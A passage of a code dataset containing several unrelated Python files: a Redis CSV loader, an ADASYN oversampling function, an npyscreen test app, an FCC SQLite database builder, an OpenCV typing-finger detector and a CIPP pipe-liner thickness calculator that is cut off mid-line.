+{"seq_id":"419175266","text":"import settings\nimport redis\nimport csv\nimport sys\nimport os\n\ndef ProcessCSVFile(r, csvin):\n\twith open(csvin, 'rt', encoding='utf-8') as csvfile:\n\t\tspamreader = csv.reader(csvfile, delimiter=',', quoting=csv.QUOTE_NONE, )\n\n\t\t# Ignore Row Header\n\t\tnext(spamreader)\n\n\t\tfor row in spamreader:\n\t\t\tProcessCustomerRow(r, row)\n\ndef ProcessCustomerRow(r, row):\n\t# CSV Header\n\t# ID,Company,Contact,ContactTitle,Address,City,Region,PostalCode,Country,Phone,Fax\n\n\t_key = \"customer-country:\" + row[8]\n\t_id = row[0]\n\tr.sadd(_key, _id)\n\nif __name__ == \"__main__\":\n\tprint(\"Reading Customers...\")\n\t_csvPath = os.path.dirname(os.path.dirname(__file__))\n\t_customersCSV = os.path.join(_csvPath, \"CSVs\", \"customers.csv\")\n\n\t# Connect to Redis\n\tr = redis.Redis(host=settings.redisSettings[\"host\"], port=settings.redisSettings[\"port\"], password=settings.redisSettings[\"password\"], db=settings.redisSettings[\"database\"])\n\n\tProcessCSVFile(r, _customersCSV)\n\n\tprint(\"Reading Customers Completed\")\n","sub_path":"Redis-Python/07_Create_Customers_Country_Key.py","file_name":"07_Create_Customers_Country_Key.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"323747464","text":"import numpy as np\nfrom sklearn import neighbors\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport operator\nfrom statistics import mean\n\n\ndef adasyn(xtrain, ytrain, target_column, class_to_boost, complex_model, nominal, n_neighbors, boost_coef):\n # (xtrain, ytrain, beta, threshold, target_column, boost_coef, K=5)\n # we introduce the parameter class weight\n # it says how many times we want to increase the population of each class\n # df, X_train, y_train, class_weight, \"target\"\n train_dataset = pd.concat([xtrain, ytrain], axis=1, sort=False)\n # print(len(train_dataset))\n # print(train_dataset)\n if class_to_boost == 1:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=False)\n m = int(sum(ytrain))\n # print(m)\n\n else:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=True)\n m1 = int(sum(ytrain))\n # print(m1)\n m = len(ytrain) - m1\n # print(m)\n\n clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\n clf.fit(xtrain, ytrain)\n\n # Step 2a, if the minority data set is below the maximum tolerated threshold, generate data.\n # Beta is the desired balance level parameter. Beta > 1 means u want more of the imbalanced type, vice versa.\n G = boost_coef * m - m\n\n # Step 2b, find the K nearest neighbours of each minority class example in euclidean distance.\n # Find the ratio ri = majority_class in neighbourhood / K\n Ri = []\n Minority_per_xi = []\n for i in range(m):\n xi = xtrain.iloc[i, :]\n # print(xi)\n # Returns indices of the closest neighbours, and return it as a list\n neighbours = clf.kneighbors([xi], n_neighbors=n_neighbors, return_distance=False)[0]\n # print(neighbours)\n # Skip classifying itself as one of its own neighbours\n # neighbours = neighbours[1:]\n\n # Count how many belongs to the majority class\n count = 0\n for value in neighbours:\n if value > m:\n count += 1\n\n # Find all the minority examples\n minority = []\n for value in neighbours:\n # Shifted back 1 because indices start at 0\n if value <= m - 1:\n minority.append(value)\n # print(minority)\n # print(count)\n if len(minority) >= 2:\n Ri.append(count / n_neighbors)\n Minority_per_xi.append(minority)\n elif len(minority) == 1:\n Ri.append(1/n_neighbors)\n Minority_per_xi.append(minority)\n else:\n Ri.append(0)\n Minority_per_xi.append(minority)\n\n # Step 2c, normalize ri's so their sum equals to 1\n Rhat_i = []\n for ri in Ri:\n rhat_i = ri / sum(Ri)\n Rhat_i.append(rhat_i)\n\n # Step 2d, calculate the number of synthetic data examples that will be generated for each minority example\n Gi = []\n for rhat_i in Rhat_i:\n gi = round(rhat_i * G)\n Gi.append(int(gi))\n # print(max(Gi))\n\n l = []\n for group in Minority_per_xi:\n l.append(len(group))\n\n # print(min(l))\n # # Step 2e, generate synthetic examples\n number_of_added_data = 0\n syn_data = []\n\n for i in range(m):\n most_common_nominal = {}\n xi = xtrain.iloc[i, :]\n if len(nominal) >= 1:\n for feature in nominal:\n count = 0\n sum_nominal = 0\n # print(feature)\n for sample in Minority_per_xi[i]:\n # print(sample)\n x_sample = xtrain.iloc[sample, :]\n # print(x_sample)\n # print(type(x_sample))\n #feature_value = x_sample[feature]\n sum_nominal += x_sample[feature]\n\n #if feature_value in count:\n # count[feature_value] += 1\n #else:\n # count[feature_value] = 1\n most_common_nominal[feature] = round(sum_nominal/len(Minority_per_xi[i]))\n #key_max = max(count.items(), key=operator.itemgetter(1))[0]\n 
#most_common_nominal[feature] = key_max\n # print(\"xi\", xi)\n for j in range(Gi[i]):\n # If the minority list is not empty\n if Minority_per_xi[i]:\n index = np.random.choice(Minority_per_xi[i])\n xzi = xtrain.iloc[index, :]\n si = xi + (xzi - xi) * np.random.uniform(0, 1)\n if len(nominal) >= 1:\n for feature in nominal:\n si[feature] = most_common_nominal[feature]\n syn_data.append(si)\n number_of_added_data += 1\n\n # Build the data matrix\n new_y = []\n for i in range(len(syn_data)):\n new_y.append(int(complex_model.predict([syn_data[i]])))\n\n new_y_df = pd.DataFrame({target_column: new_y})\n new_df = pd.DataFrame(syn_data)\n new_df.reset_index(drop=True, inplace=True)\n new_df = pd.concat([new_df, new_y_df], axis=1)\n\n return new_df\n","sub_path":"adasyn_optimal.py","file_name":"adasyn_optimal.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
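A toy invocation sketch of `adasyn` above. The routine indexes `xtrain.iloc[0:m]` as the boosted class, so it appears to assume those rows come first; the data, model choice and parameters below are all made up for illustration:

import pandas as pd
from sklearn.linear_model import LogisticRegression

# 3 minority (class 1) rows first, then 5 majority (class 0) rows
X = pd.DataFrame({'f1': [0.1, 0.2, 0.15, 1.0, 1.1, 0.9, 1.2, 1.05],
                  'f2': [0.2, 0.1, 0.25, 1.0, 0.9, 1.1, 1.2, 0.95]})
y = pd.Series([1, 1, 1, 0, 0, 0, 0, 0], name='target')

model = LogisticRegression().fit(X, y)

# ask for twice the minority population; labels for the synthetic
# rows come from model.predict, exactly as in new_y above
synthetic = adasyn(X, y, 'target', class_to_boost=1, complex_model=model,
                   nominal=[], n_neighbors=5, boost_coef=2)
print(len(synthetic))  # here G = 3, so roughly 3 synthetic rows

Note that n_neighbors must be large enough for some majority points to fall in each minority neighbourhood, otherwise all ri are zero and the normalisation in step 2c divides by zero.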
+{"seq_id":"451203732","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# apt-get install python-tk\n#from Tkinter import *\nimport os, time\nimport weakref\nimport npyscreen\nimport curses\nimport select, os\nfrom npyscreen import MultiLine\n\nclass ActionControllerSearch(npyscreen.ActionControllerSimple):\n def create(self):\n self.add_action('^/.*', self.set_search, True)\n\n def set_search(self, command_line, widget_proxy, live):\n self.parent.value.set_filter(command_line[1:])\n self.parent.wMain.values = self.parent.value.get()\n self.parent.wMain.display()\n\nclass MyTextCommandBox(npyscreen.TextCommandBox):\n def __init__(self, screen, \n history=False, \n history_max=100, \n set_up_history_keys=True,\n *args, **keywords):\n super(MyTextCommandBox, self).__init__(screen, history=history, history_max=history_max, \n set_up_history_keys=set_up_history_keys, *args, **keywords)\n self.keypress_timeout = 5\n def set_up_handlers(self):\n super(MyTextCommandBox, self).set_up_handlers()\n self.keypress_timeout = 5\n def pass_control(self, command):\n self.parent.action_controller.process_control(command, weakref.proxy(self))\n def while_waiting(self):\n self.parent.while_waiting()\n\n\nclass FmSearchActive(npyscreen.FormMuttActiveTraditional):\n ACTION_CONTROLLER = ActionControllerSearch\n COMMAND_WIDGET_CLASS = MyTextCommandBox\n\nclass TestApp(npyscreen.NPSApp):\n def main(self):\n F = FmSearchActive()\n F.wStatus1.value = \"Status Line \"\n F.wStatus2.value = \"Second Status Line \"\n F.value.set_values([str(x) for x in range(500)])\n F.wMain.values = F.value.get()\n\n F.edit()\n\n\nif __name__ == \"__main__\":\n App = TestApp()\n App.run()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"198173972","text":"import sqlite3\nfrom pyFCC.archive import parse_fccid\n\n# creates a sqlite database for use with grantee data\ndef create_grantee_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute(\"\"\"DROP TABLE IF EXISTS grantees\"\"\")\n conn.commit()\n\n c.execute('''CREATE TABLE grantees\n (grantee_code int PRIMARY KEY NOT NULL, \n grantee_name text,\n mailing_address text,\n po_box text,\n city text,\n state text,\n country text,\n zip_code text,\n contact_name text,\n date_received text)''')\n conn.commit()\n c.close()\n print(\"Grantee table created in FCC.db\")\n\ndef create_product_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS products\n (grantee_code int NOT NULL REFERENCES grantees(grantee_code), \n product_code text,\n url text,\n high_freq text,\n low_freq text,\n version text,\n UNIQUE(grantee_code, product_code, version))''') #version doesn't currently have anything\n conn.commit()\n c.close()\n print(\"Product table created in FCC.db\")\n\n# populates an existing database table with grantee data\ndef populate_grantees(granteeTest):\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT INTO grantees VALUES (?,?,?,?,?,?,?,?,?,?)', granteeTest)\n conn.commit()\n c.close()\n print(\"Grantee Table populated in FCC.db\")\n\n# populates an existing database table with product data\ndef populate_products(productsTest):\n productList = []\n for key, value in productsTest.items():\n for version, row in enumerate(value, 1):\n detail_url, ID, low, high = row\n appid, productid = parse_fccid(ID)\n row = (appid, productid, detail_url, high, low, version)\n productList.append(row)\n\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT OR IGNORE INTO products VALUES (?,?,?,?,?,?)', productList)\n conn.commit()\n c.close()\n print(\"Product Table populated in FCC.db\")\n\n","sub_path":"pyFCC/fccDB.py","file_name":"fccDB.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"355046435","text":"# coding: UTF-8\r\n# keycode_microtime.csvから入力されたキーコードと入力時間keycのデータを読み込み、画像処理によりどの指で押されたかの情報を取得して付加し、keycode_microtime_finger.csvへ出力\r\nimport numpy as np\r\nimport cv2\r\nimport csv\r\nimport random\r\nimport sys\r\nimport math\r\n\r\n# なんか謎のエラー https://stackoverflow.com/questions/21296475/python-dateutil-unicode-warning を防止\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n\r\nFPS = 30\r\nMOVIENAME = './IMG_0945.MOV'\r\n\r\nwhere_key = {}\r\nwhere_key['q'] = [295, 378]\r\nwhere_key['w'] = [420, 380]\r\nwhere_key['e'] = [540, 382]\r\nwhere_key['r'] = [665, 385]\r\nwhere_key['t'] = [787, 386]\r\nwhere_key['y'] = [913, 388]\r\nwhere_key['u'] = [1040, 390]\r\nwhere_key['i'] = [1166, 392]\r\nwhere_key['o'] = [1294, 396]\r\nwhere_key['p'] = [1423, 397]\r\nwhere_key['a'] = [340, 487]\r\nwhere_key['s'] = [458, 489]\r\nwhere_key['d'] = [578, 490]\r\nwhere_key['f'] = [696, 494]\r\nwhere_key['g'] = [818, 497]\r\nwhere_key['h'] = [939, 500]\r\nwhere_key['j'] = [1062, 502]\r\nwhere_key['k'] = [1186, 506]\r\nwhere_key['l'] = [1310, 508]\r\nwhere_key['z'] = [415, 595]\r\nwhere_key['x'] = [530, 594]\r\nwhere_key['c'] = [647, 597]\r\nwhere_key['v'] = [765, 602]\r\nwhere_key['b'] = [882, 604]\r\nwhere_key['n'] = [999, 607]\r\nwhere_key['m'] = [1119, 610]\r\n\r\nneiborhood8 = np.array([\r\n [1, 1, 1],\r\n [1, 1, 1],\r\n [1, 1, 1]],\r\n np.uint8)\r\n\r\ndef erode(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=30)\r\n return img_erosion\r\n \r\ndef erode2(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=15)\r\n return img_erosion\r\n \r\ndef dilate(img):\r\n img_dilation = cv2.dilate(img, neiborhood8, iterations=10)\r\n return img_dilation\r\n\r\ndef color(img, color):\r\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hsv形式\r\n # 取得する色の範囲を指定\r\n # color: blue, pink, green\r\n if color == 'blue':\r\n lower = np.array([80, 80, 70])\r\n upper = np.array([116, 255, 255])\r\n elif color == 'green':\r\n lower = np.array([20, 40, 30])\r\n upper = np.array([90, 255, 255])\r\n\r\n # 指定した色に基づいたマスクの生成\r\n img_mask = cv2.inRange(hsv_img, lower, upper)\r\n # 画像とマスクの共通の領域を抽出\r\n return cv2.bitwise_and(img, img, mask=img_mask)\r\n\r\ndef map_cog(src, img):\r\n thresh = 30\r\n\r\n binary = cv2.threshold(cv2.cvtColor(src, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n n, label, contours, cogs = cv2.connectedComponentsWithStats(binary)\r\n print(n)\r\n\r\n # 重心\r\n cog_positions = []\r\n for i in range(n):\r\n # skip overall cog\r\n if i==0:\r\n continue\r\n\r\n cog_pos = [int(cogs[i][0]), int(cogs[i][1])]\r\n cog_positions.append(cog_pos)\r\n img = cv2.circle(img, (int(cogs[i][0]), int(cogs[i][1])), 10, (0, 0, 255), -1)\r\n return cog_positions\r\n\r\ndef dst_double(src, dst):\r\n return math.sqrt((dst[0] - src[0])**2 + (dst[1] - src[1])**2)\r\n\r\n# 画像フレームから運指を取得\r\ndef get_finger_id(arg_keycode, arg_frame):\r\n # タイミングに応じてframeをcaptureしてimread\r\n if chr(arg_keycode) == ' ':\r\n return 4\r\n img = arg_frame\r\n height = img.shape[0]\r\n width = img.shape[1]\r\n cv2.rectangle(img, (int(width), int(height/3)), (width-1, height-1), (255, 255, 255), -1)\r\n\r\n target_key_position = [where_key[chr(arg_keycode)][0], where_key[chr(arg_keycode)][1]] # test\r\n\r\n\r\n # img = cv2.circle(img, (50, 200), 20, (0, 0, 255), -1)\r\n\r\n blue_part_pre = color(img, 'blue')\r\n green_part_pre = color(img, 'green')\r\n cv2.namedWindow(\"blue_part_hsv\")\r\n cv2.imshow(\"blue_part_hsv\", blue_part_pre)\r\n # 
cv2.resizeWindow('blue_part_hsv', 1280, 720)\r\n    cv2.namedWindow(\"green_part_hsv\")\r\n    cv2.imshow(\"green_part_hsv\", green_part_pre)\r\n    # cv2.resizeWindow('green_part_hsv', 1280, 720)\r\n\r\n    blue_part = erode(color(img, 'blue'))\r\n    blue_part = dilate(blue_part)\r\n    green_part = erode2(color(img, 'green'))\r\n\r\n    #cv2.rectangle(green_part, (width, height/4), (width-1, height-1), (0, 0, 0), -1)\r\n\r\n    # 重心をもとに各指の位置同定\r\n    # sort centroids left-to-right by x; np.sort(..., axis=0) would sort x and y independently and break the (x, y) pairs\r\n    blue_cog_positions = np.array(sorted(map_cog(blue_part, img), key=lambda p: p[0]))\r\n    green_cog_positions = np.array(sorted(map_cog(green_part, img), key=lambda p: p[0]))\r\n    print(blue_cog_positions)\r\n    print(green_cog_positions)\r\n\r\n    thresh = 30\r\n\r\n    binary_blue = cv2.threshold(cv2.cvtColor(blue_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n    # binary_blue = cv2.bitwise_not(blue_part)\r\n    cv2.namedWindow(\"binary_blue\")\r\n\r\n    cv2.imshow(\"binary_blue\", binary_blue)\r\n    # cv2.resizeWindow('binary_blue', 1280, 720)\r\n\r\n    binary_green = cv2.threshold(cv2.cvtColor(green_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n    # binary_green = cv2.bitwise_not(green_part)\r\n    cv2.namedWindow(\"binary_green\")\r\n\r\n    cv2.imshow(\"binary_green\", binary_green)\r\n    # cv2.resizeWindow('binary_green', 1280, 720)\r\n\r\n    # さらにそのタイミングでのキー位置を取得\r\n\r\n    # graphic\r\n    WINDOW_1 = \"erode30_blue\"\r\n    WINDOW_2 = \"erode15_green\"\r\n    WINDOW_3 = \"detect\"\r\n    #WINDOW_4 = \"4\"\r\n    #WINDOW_5 = \"5\"\r\n    cv2.namedWindow(WINDOW_1)\r\n    cv2.namedWindow(WINDOW_2)\r\n    cv2.namedWindow(WINDOW_3)\r\n    #cv2.namedWindow(WINDOW_4)\r\n    #cv2.namedWindow(WINDOW_5)\r\n\r\n    cv2.imshow(WINDOW_1, blue_part)\r\n    cv2.imshow(WINDOW_2, green_part)\r\n    cv2.imshow(WINDOW_3, img)\r\n    # cv2.resizeWindow(WINDOW_1, 1280, 720)\r\n    # cv2.resizeWindow(WINDOW_2, 1280, 720)\r\n    # cv2.resizeWindow(WINDOW_3, 1280, 720)\r\n    cv2.waitKey(0)\r\n    cv2.destroyAllWindows()\r\n\r\n    # 適切なキーに最も近い指を確定\r\n    if blue_cog_positions.shape[0] != 4 or green_cog_positions.shape[0] != 4:\r\n        return -1\r\n\r\n    r_ko = blue_cog_positions[0]\r\n    r_ks = green_cog_positions[0]\r\n    r_na = blue_cog_positions[1]\r\n    r_hi = green_cog_positions[1]\r\n    l_hi = blue_cog_positions[2]\r\n    l_na = green_cog_positions[2]\r\n    l_ks = blue_cog_positions[3]\r\n    l_ko = green_cog_positions[3]\r\n\r\n    arr = np.array([dst_double(r_ko, target_key_position),\r\n                    dst_double(r_ks, target_key_position),\r\n                    dst_double(r_na, target_key_position),\r\n                    dst_double(r_hi, target_key_position),\r\n                    9999999.9,\r\n                    9999999.9,\r\n                    dst_double(l_hi, target_key_position),\r\n                    dst_double(l_na, target_key_position),\r\n                    dst_double(l_ks, target_key_position),\r\n                    dst_double(l_ko, target_key_position)])\r\n\r\n    print(arr)\r\n    print(arr.argmin())\r\n\r\n    return arr.argmin()\r\n\r\n# csvファイルハンドラ\r\nfr = open('douga_keycode_microtime.csv', 'rb')\r\nfw = open('keycode_microtime_finger.csv', 'w')\r\ndataReader = csv.reader(fr)\r\ndataWriter = csv.writer(fw, lineterminator='\\n')\r\n\r\n# キーコードと入力時間のデータを格納する辞書の配列\r\nkeycode_microtimes = []\r\nfor (i, row) in enumerate(dataReader):\r\n    keycode_microtimes.append({})\r\n    keycode_microtimes[i]['keycode'] = int(row[0])\r\n    keycode_microtimes[i]['microtime'] = int(row[1])\r\n    keycode_microtimes[i]['isCorrect'] = int(row[2])\r\n\r\n\r\n# strを数値形式にする & 入力時間をフレームに変換\r\nfor keycode_microtime in keycode_microtimes:\r\n    keycode_microtime['keycode'] = keycode_microtime['keycode']\r\n    keycode_microtime['frame'] = int(round(float(keycode_microtime['microtime']) / 1000000.0 * FPS))\r\n\r\n#### ここから、動画の入力開始位置合わせ (usage: 入力開始位置フレームでqを押す。
入力開始位置フレームじゃない時はq以外を押すと次のフレームへ移動する。)\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n# cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n# cv2.resizeWindow('image', 1280, 720)\r\n\r\nframecount = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n # 画面にフレームを表示\r\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n \r\n\r\n cv2.imshow('image', frame)\r\n # cv2.resizeWindow('image', 1280, 720)\r\n \r\n # qが押されたら抜ける(入力開始位置)、q以外を押すと次のフレームへ\r\n inputkeycode = cv2.waitKey(0)\r\n if inputkeycode == 113:\r\n break\r\n \r\n framecount += 1\r\n\r\n# 入力開始位置分だけフレーム数をオフセット\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['frame'] += framecount\r\n\r\ncap.release()\r\n\r\ncv2.destroyAllWindows()\r\n\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n#### ここから、入力に対応する画像フレームから画像処理で運指情報を抜き出し\r\nframecount = 0\r\n# 今何個目のキー入力まで運指情報取得が終わったか\r\nkeycode_microtimes_count = 0\r\nbreakflag = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n while keycode_microtimes_count < len(keycode_microtimes) and framecount == keycode_microtimes[keycode_microtimes_count]['frame'] :\r\n # 画像処理して運指を取得\r\n keycode_microtimes[keycode_microtimes_count]['finger_id'] = get_finger_id(keycode_microtimes[keycode_microtimes_count]['keycode'], frame)\r\n windowname = chr(keycode_microtimes[keycode_microtimes_count]['keycode'])\r\n # cv2.namedWindow(windowname, cv2.WINDOW_NORMAL)\r\n # cv2.resizeWindow(windowname, 1280, 720)\r\n # cv2.imshow(windowname, frame)\r\n # inputkeycode = cv2.waitKey(0)\r\n # if inputkeycode == 27:\r\n # breakflag = 1\r\n # break\r\n # cv2.destroyAllWindows()\r\n keycode_microtimes_count += 1\r\n if breakflag == 1:\r\n break\r\n framecount += 1\r\n \r\n\r\n#### CSVへ書き出し\r\nfor i in xrange(0, len(keycode_microtimes)): \r\n csv_writerow = []\r\n csv_writerow.append(keycode_microtimes[i]['keycode'])\r\n csv_writerow.append(keycode_microtimes[i]['microtime'])\r\n csv_writerow.append(keycode_microtimes[i]['isCorrect'])\r\n csv_writerow.append(keycode_microtimes[i]['frame'])\r\n csv_writerow.append(keycode_microtimes[i]['finger_id'])\r\n dataWriter.writerow(csv_writerow)\r\n\r\nfr.close()\r\nfw.close()\r\n \r\ncv2.destroyAllWindows()","sub_path":"TypeFingerDetector/TypeFingerDetector/Release/demo_imageProcessing.py","file_name":"demo_imageProcessing.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
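The heart of `get_finger_id` in the record above is a nearest-centroid pick: eight fingertip centroids ordered left-to-right, sentinel distances in the two thumb slots, then `argmin`. A self-contained sketch of just that selection step, with synthetic coordinates (not taken from the video):

```python
# Standalone version of the distance-and-argmin step; coordinates are synthetic.
import math
import numpy as np

def nearest_finger(finger_positions, key_xy, sentinel=9999999.9):
    # None marks a slot that cannot type (the two thumbs in the script above).
    dists = [math.dist(p, key_xy) if p is not None else sentinel
             for p in finger_positions]
    return int(np.argmin(dists))

fingers = [(300, 480), (420, 490), (540, 490), (660, 495),    # one hand
           None, None,                                        # thumb slots
           (940, 500), (1060, 500), (1180, 505), (1310, 510)] # other hand
print(nearest_finger(fingers, key_xy=(696, 494)))  # -> 3, the closest fingertip
```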
+{"seq_id":"626611322","text":"from math import trunc, exp, pi\n\nclass LinerManager(object):\n '''Instances of the LinerManager class take a dictionary of keys and\n values and determine the thickness of the CIPP liner'''\n # Standard live load table for AASHTO H20 highway loads,# Cooper E-80\n # rail, or 180 kip airplane gear load. Impact factors have already been\n # integrated.\n live_load_hwy = {\n 2:5.56, 3:4.17, 4:2.78, 5:1.74, 6:1.39, 7:1.22, 8:0.69\n }\n live_load_rail = {\n 2:26.39, 3:23.61, 4:18.4, 5:16.67, 6:15.63, 7:12.15,\n 8: 11.11, 10:7.64, 12:5.56, 14:4.17, 16:3.47, 18:2.78,\n 20:2.08, 22:1.91, 24:1.74, 26:1.39, 28:1.04, 30:0.69\n }\n live_load_arpt = {\n 2:13.14, 3:12.28, 4:11.27, 5:10.09, 6:8.79, 7:7.85,\n 8:6.93, 10:6.09, 12:4.76, 14:3.06, 16:2.29, 18:1.91,\n 20:1.53, 22:1.14, 24:1.05\n }\n \n def __init__(self, vardict):\n # The enhancement_factor and soil_mod are submitted exclusivly with\n # the dictionary. The following if statements prevent key failures\n if 'enhancement_factor' not in vardict:\n vardict['enhancement_factor'] = ''\n if 'soil_mod' not in vardict:\n vardict['soil_mod'] = ''\n \n # If value is left blank, assume default (ASTM)\n\n default_values = {\n 'design_modulus':250000, 'design_flexural_strength':4500,\n 'safety_factor':2.0, 'ret_factor':50, 'ovality':3.0,\n 'enhancement_factor':7.0, 'gw_level':0.0, 'soil_density':140,\n 'poissons':0.3, 'soil_mod':700, 'n_host':0.013, 'n_liner':0.010,\n 'host_age':50\n }\n \n for key, value in vardict.items():\n if vardict[key] == '':\n vardict[key] = default_values[key]\n \n #tempvardict = {}\n \n #for key, value in vardict.items():\n #tempvardict['self.'+key] = vardict[key]\n \n #vardict = tempvardict\n \n for key, value in vardict.items():\n try:\n float(vardict[key])\n vardict[key] = float(vardict[key])\n except:\n vardict[key] = vardict[key]\n \n self.vardict = vardict\n \n # Calculated variables\n self.vardict['soil_depth'] = (vardict['surface_to_invert']\n -(vardict['host_diameter'])/12)\n self.vardict['gw_head'] = (vardict['surface_to_invert']\n - vardict['gw_level'])\n if self.vardict['gw_head'] <= 0:\n self.vardict['gw_head'] = 0\n self.vardict['ov_red_fact'] = (((1-(vardict['ovality']/100))/((1+(\n vardict['ovality']/100))**2))**3)\n self.vardict['lng_term_modulus'] = ((vardict['ret_factor']/100)\n *vardict['design_modulus'])\n self.vardict['lng_term_flex_strength'] = (\n (vardict['ret_factor']/100)\n *vardict['design_flexural_strength'])\n self.vardict['gw_load'] = self.vardict['gw_head']/2.31\n\n \n def x1p1(self):\n '''X1.1 - Partially deteriorated gravity pipe condition support\n hydraulic load of groundwater'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n ef = self.vardict['enhancement_factor']\n mod = self.vardict['lng_term_modulus']\n oval = self.vardict['ov_red_fact']\n mu = self.vardict['poissons']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n sdr = (((2*ef*mod*oval)/((1-(mu**2))*gwload*FS))**(1.0/3.0))\n liner_thickness_x1p1 = dia/sdr\n return liner_thickness_x1p1\n\n def x1p2(self):\n '''X1.2 - If there is no groundwater above the pipe, the CIPP should \n have a maximum SDR of 100'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n gwhead = self.vardict['gw_head']\n \n # Calculate\n if (gwhead <= 0):\n liner_thickness_x1p2 = dia/100\n return liner_thickness_x1p2\n else:\n return 0\n\n def x1p2p1p1(self):\n '''X1.2.1.1 - if the original pipe is oval, the design from X1.1 shall\n have a 
minimum thickness as calculated by:'''\n        # Pull variables from dictionary\n        dia = self.vardict['host_diameter']\n        oval = self.vardict['ovality'] # percent ovality q; the reduction factor 'ov_red_fact' belongs in X1.1, not in this equation\n        flex = self.vardict['lng_term_flex_strength']\n        FS = self.vardict['safety_factor']\n        gwload = self.vardict['gw_load']\n\n        # Calculate\n        pythag_A = (1.5*(oval/100))*(1+(oval/100))\n        pythag_B = (-0.5*(1+((oval/100))))\n        pythag_C = -flex/(gwload*FS)\n        root_1 = (-pythag_B+((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n        root_2 = (-pythag_B-((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n        if (root_1 < 0):\n            root_1 = 999\n        if (root_2 < 0):\n            root_2 = 999\n        root = min(root_1, root_2)\n        liner_thickness_x1p2p1p1 = dia/root\n        return liner_thickness_x1p2p1p1\n\n    \"\"\" For non-standard live loads, or concentrated load, use eq. and impact factors.\n    Load eq.\n    Pp = 3*Ps / 2*pi*(C^2)*((1+((d/c)^2))^2.5)\n    Pp = pressure transmitted to pipe\n    Ps = Load at surface (lbs)\n    C = depth of cover (in for psi, ft for psf)\n    d = horiz. offset distance from pipe to line of application of surface load (in for psi, ft for psf)\n\n    #Impact factor - if less than x, y. If over x>3 use y4.\n    imp_fact_hwy = { 1:1.5, 2:1.35, 3:1.15, 100:1.0 }\n    imp_fact_rail = { 1:1.75, 2:1.5, 3:1.5, 100:1.35 }\n    imp_fact_arpt = { 1:1.5, 2:1.35, 3:1.35, 100:1.15 }\n\n    # Triggers for specialized investigation if load area > 10 sq ft and:\n    # 500 psf for pre-1941 pipelines\n    # 1000 psf for 12-inch diameter or larger\n    # 1500 psf for pipelines smaller than 12-inch dia\n    \"\"\"\n\n    def live_load_determination(self):\n        ''' X1.2.2 - Fully deteriorated gravity pipe. Designed to support hydraulic, soil, and live loads.\n        Live load calculation method must be determined\n        Standard using AASHTO charts'''\n        # Pull variables from dictionary\n        location = self.vardict['location']\n        depth = self.vardict['soil_depth']\n\n        # Determine Live Load\n        if (location == 'Highway'):\n            if (depth >= 10):\n                live_load = 0\n            elif (depth > 8 and depth < 10):\n                live_load = 0.69\n            elif (depth < 2):\n                live_load = 5.56\n            else:\n                live_load_index = trunc(depth)\n                live_load = self.live_load_hwy[live_load_index]\n        elif (location == 'Rail'):\n            if (depth > 30):\n                live_load = 0\n            elif (depth > 8 and depth <= 30):\n                live_load_index = 2*trunc(0.5*depth)\n                live_load = self.live_load_rail[live_load_index]\n            elif (depth < 2):\n                live_load = 26.39\n            else:\n                live_load_index = trunc(depth)\n                live_load = self.live_load_rail[live_load_index]\n        elif (location == 'Airport'):\n            if (depth > 24):\n                live_load = 0\n            elif (depth > 8 and depth <= 24):\n                live_load_index = 2*trunc(0.5*depth)\n                live_load = self.live_load_arpt[live_load_index]\n            elif (depth < 2):\n                live_load = 13.14\n            else:\n                live_load_index = trunc(depth)\n                live_load = self.live_load_arpt[live_load_index]\n        else:\n            live_load = None\n        return live_load\n\n    def x1p2p2(self):\n        # Pull variables from dictionary\n        dia = self.vardict['host_diameter']\n        gwhead = self.vardict['gw_head']\n        depth = self.vardict['soil_depth']\n        W = self.vardict['soil_density']\n        FS = self.vardict['safety_factor']\n        smod = self.vardict['soil_mod']\n        oval = 